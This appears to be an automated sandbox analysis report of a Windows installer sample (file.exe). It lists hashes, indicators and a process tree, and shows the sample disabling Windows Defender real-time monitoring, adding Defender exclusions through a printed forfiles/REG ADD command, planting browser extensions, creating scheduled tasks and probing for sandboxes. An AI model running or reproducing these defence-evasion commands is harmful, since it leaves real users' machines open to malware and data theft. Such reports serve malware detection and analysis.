Analysis
-
max time kernel
128s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04/02/2023, 17:16
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
814355146c80a0621508ccb76b1722b5
-
SHA1
db36a41b6e01382c6c312ab10885e9fc47055be9
-
SHA256
22ada2212b1f914792503254ce9308b30f661d83a4c48efdf14a824f5e674fae
-
SHA512
7b44c7338dafdd8672ee1ccd75d94b425f1255250c831f434ceac910bbbebc355f30f3ae24f8a239889d08227ce5844597f210b89ab0c060e214a1db76268662
-
SSDEEP
196608:91ORmQ4C7W+LNR8JYQNs4sSROq+zIj2MOTJhre9Bor:3ORmQ4goY81+8SMO1xm+r
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TPVzhEqTdbaLncel = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QfvXVdpwU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TPVzhEqTdbaLncel = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DfJvMZcohastC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DfJvMZcohastC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RgzQVJUCyDgmqiJXo = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QfvXVdpwU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\XbMKmfBwBDDwRKVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\XbMKmfBwBDDwRKVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TPVzhEqTdbaLncel = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAIUtCbZzZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAIUtCbZzZUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFMikQRJUGqU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fFMikQRJUGqU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\TPVzhEqTdbaLncel = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1836 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\International\Geo\Nation bUrsYKP.exe -
Executes dropped EXE 4 IoCs
pid Process 1116 Install.exe 1196 Install.exe 1944 PmsRSUF.exe 556 bUrsYKP.exe -
Loads dropped DLL 12 IoCs
pid Process 1476 file.exe 1116 Install.exe 1116 Install.exe 1116 Install.exe 1116 Install.exe 1196 Install.exe 1196 Install.exe 1196 Install.exe 1836 rundll32.exe 1836 rundll32.exe 1836 rundll32.exe 1836 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json bUrsYKP.exe -
Drops file in System32 directory 19 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PmsRSUF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bUrsYKP.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol PmsRSUF.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat bUrsYKP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA bUrsYKP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bUrsYKP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 bUrsYKP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 bUrsYKP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 bUrsYKP.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini PmsRSUF.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 bUrsYKP.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol bUrsYKP.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA bUrsYKP.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi bUrsYKP.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak bUrsYKP.exe File created C:\Program Files (x86)\fFMikQRJUGqU2\SxpmRZEzvyJro.dll bUrsYKP.exe File created C:\Program Files (x86)\DfJvMZcohastC\CFUKLYG.xml bUrsYKP.exe File created C:\Program Files (x86)\IAIUtCbZzZUn\HuEbosD.dll bUrsYKP.exe File created C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR\lsvPlzh.xml bUrsYKP.exe File created C:\Program Files (x86)\DfJvMZcohastC\awXIVar.dll bUrsYKP.exe File created C:\Program Files (x86)\QfvXVdpwU\xmZzyr.dll bUrsYKP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi bUrsYKP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja bUrsYKP.exe File created C:\Program Files (x86)\QfvXVdpwU\xygbfOX.xml bUrsYKP.exe File created C:\Program Files (x86)\fFMikQRJUGqU2\ostmdPe.xml bUrsYKP.exe File created C:\Program Files (x86)\OgVgWOcZKYDaxPHefDR\pIvhIUu.dll bUrsYKP.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\EYzwTnvEQRecZIn.job schtasks.exe File created C:\Windows\Tasks\lvaVsmZHGpIVGhWCV.job schtasks.exe File created C:\Windows\Tasks\bWPHdmAVYBQYtPDpwk.job schtasks.exe File created C:\Windows\Tasks\JkhvNaHMbfLntcTvc.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1948 schtasks.exe 1132 schtasks.exe 1368 schtasks.exe 1220 schtasks.exe 580 schtasks.exe 812 schtasks.exe 1520 schtasks.exe 644 schtasks.exe 1596 schtasks.exe 1956 schtasks.exe 1484 schtasks.exe 1536 schtasks.exe 556 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecision = "0" bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings bUrsYKP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63} bUrsYKP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63}\WpadDecisionReason = "1" bUrsYKP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63}\WpadNetworkName = "Network 3" bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bUrsYKP.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63}\WpadDecisionTime = 70930f0ac538d901 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs bUrsYKP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates bUrsYKP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63}\c6-9a-42-39-2d-49 bUrsYKP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecisionReason = "1" bUrsYKP.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecisionTime = 70930f0ac538d901 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs bUrsYKP.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecisionReason = "1" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad bUrsYKP.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5EED3E67-D8D0-4532-B193-B4F287CB6D63}\WpadDecision = "0" bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0086000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs bUrsYKP.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0086000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root bUrsYKP.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople bUrsYKP.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-9a-42-39-2d-49\WpadDecisionTime = 70930f0ac538d901 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1728 powershell.EXE 1728 powershell.EXE 1728 powershell.EXE 1800 powershell.EXE 1800 powershell.EXE 1800 powershell.EXE 1536 powershell.EXE 1536 powershell.EXE 1536 powershell.EXE 644 powershell.EXE 644 powershell.EXE 644 powershell.EXE 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe 556 bUrsYKP.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1728 powershell.EXE Token: SeDebugPrivilege 1800 powershell.EXE Token: SeDebugPrivilege 1536 powershell.EXE Token: SeDebugPrivilege 644 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1476 wrote to memory of 1116 1476 file.exe 27 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1116 wrote to memory of 1196 1116 Install.exe 28 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1764 1196 Install.exe 30 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1196 wrote to memory of 1252 1196 Install.exe 32 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1764 wrote to memory of 1396 1764 forfiles.exe 35 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1252 wrote to memory of 1456 1252 forfiles.exe 34 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1396 wrote to memory of 2020 1396 cmd.exe 36 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1456 wrote to memory of 1740 1456 cmd.exe 37 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1396 wrote to memory of 556 1396 cmd.exe 39 PID 1456 wrote to memory of 2000 1456 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Users\Admin\AppData\Local\Temp\7zS2128.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\7zS2647.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
